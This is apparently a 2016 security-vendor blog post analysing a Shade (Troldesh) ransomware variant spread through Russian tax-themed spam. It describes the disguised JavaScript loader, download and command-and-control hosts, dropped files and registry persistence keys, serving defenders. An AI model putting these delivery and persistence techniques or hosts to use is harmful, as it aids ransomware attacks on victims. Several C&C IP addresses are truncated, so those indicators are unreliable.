The Shade (Troldesh) Ransomware: One More Soldier in the Army of Encryption Miscreants

Written by Mickael S. and Tanya K.

Last week, SenseCy analysts happened upon a new sample of Shade ransomware, also known as Troldesh, which uses a no_more_ransom extension for encrypted files. This ransomware is far from famous, lacking the glorious aura of its rivals, Locky and Cerber. The NoMoreRansom project released a decryption tool for Shade in the summer, but apparently it is not suitable for this new Shade variant, and turns it into an even more damaging ransomware that it was before.

This variant (which ironically uses a no_more_ransom extension) was delivered in a taxes-themed spam email message in Russian in early December 2016, and according to comments on Russian-language technical support forums, it became active in the last week of November. Interestingly, all the infection victims mentioned some accounting-themed spam messages that led to the infection when inadvertently opened. Even more interestingly, the victims also claimed that all 1C (an accounting software popular in Russian) databases were encrypted after the infection.

Ostensibly, this Shade variant targets mainly Russian users, however the ransom message appears in English as well, suggesting possible future attacks outside of Russia.

Our technical analysis revealed that the ransomware is delivered using a Javascript loader (attached to the spam email message), which uses the tried and trusted technique of adding an Excel extension in the name of the file, to confuse the user: file name_xls.js.

This Javascript script is heavily obfuscated, but we were still able to ascertain that it uses the notorious ActiveXObject (that functions in the Internet Explorer browser, but not in Firefox or Chrome)

An excerpt of the obfuscated code:

Once the JS script is executed, it will try to download the malicious file from two sources: either from 195.238.172.21 IP address (theacornalliance.org) or from 5.187.2.119 IP address (d-v.by). Then, the helpconfig.exe is downloaded to the infected PC.

GET request for the file helpconfig.exe from theacornalliance.org domain:

The file is dropped into the following path: %AppData%\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\643WD09Y\helpconfig[1].exe
In fact, helpconfig.exe file serves as an installer, where the payload hides itself (using nullsoft installer).
Once helpconfig.exe is executed, it will extract the following files:

  • %TEMP%\nsiAC44.tmp
  • %TEMP%\hal.gif
  • %TEMP%\wp-json
  • %TEMP%\home_mobile.png
  • %TEMP%\logo.gif
  • %TEMP%\wp-paginate.css
  • %TEMP%\printer.css
  • %TEMP%\svgeezy.min.js
  • %TEMP%\FzBOcU5n.1pptnUyaetCFUlk
  • %TEMP%\nsyACD2.tmp
  • %TEMP%\nsyACD2.tmp\pressure.dll

And create several registry keys:

  • config:
    • HKCU\Software\System32\Configuration\xi
    • HKCU\Software\System32\Configuration\xVersion

  • autostart:
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem

It will then create a copy of itself under the process name csrss (a legitimate Windows process, whose removal will result in a Blue Screen of Death)

After these steps, the malware will try to connect to some C&C servers (part of which are TOR nodes):

  • 25.193.9 (ehlo.4711.se) – a TOR node
  • 73.17.194 (turtles.fscked.org)
  • 35.32.5  (faravahar.rabbani.jp)
  • 31.0.39 (belegost.csail.mit.edu)
  • 83.223.34 (rgnx.net) – a TOR node

At this point, the encryption process starts.
The encryption message:

In the README.txt file, the victim is instructed to contact lukyan.sazonov26[at]gmail.com to receive further instructions. This email address was previously associated with the Da Vinci ransomware, which served as inspiration for Shade ransomware.

If no reply is received from this address after 48 hours, the victim is instructed to fill out a contact form located on the TOR network:


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s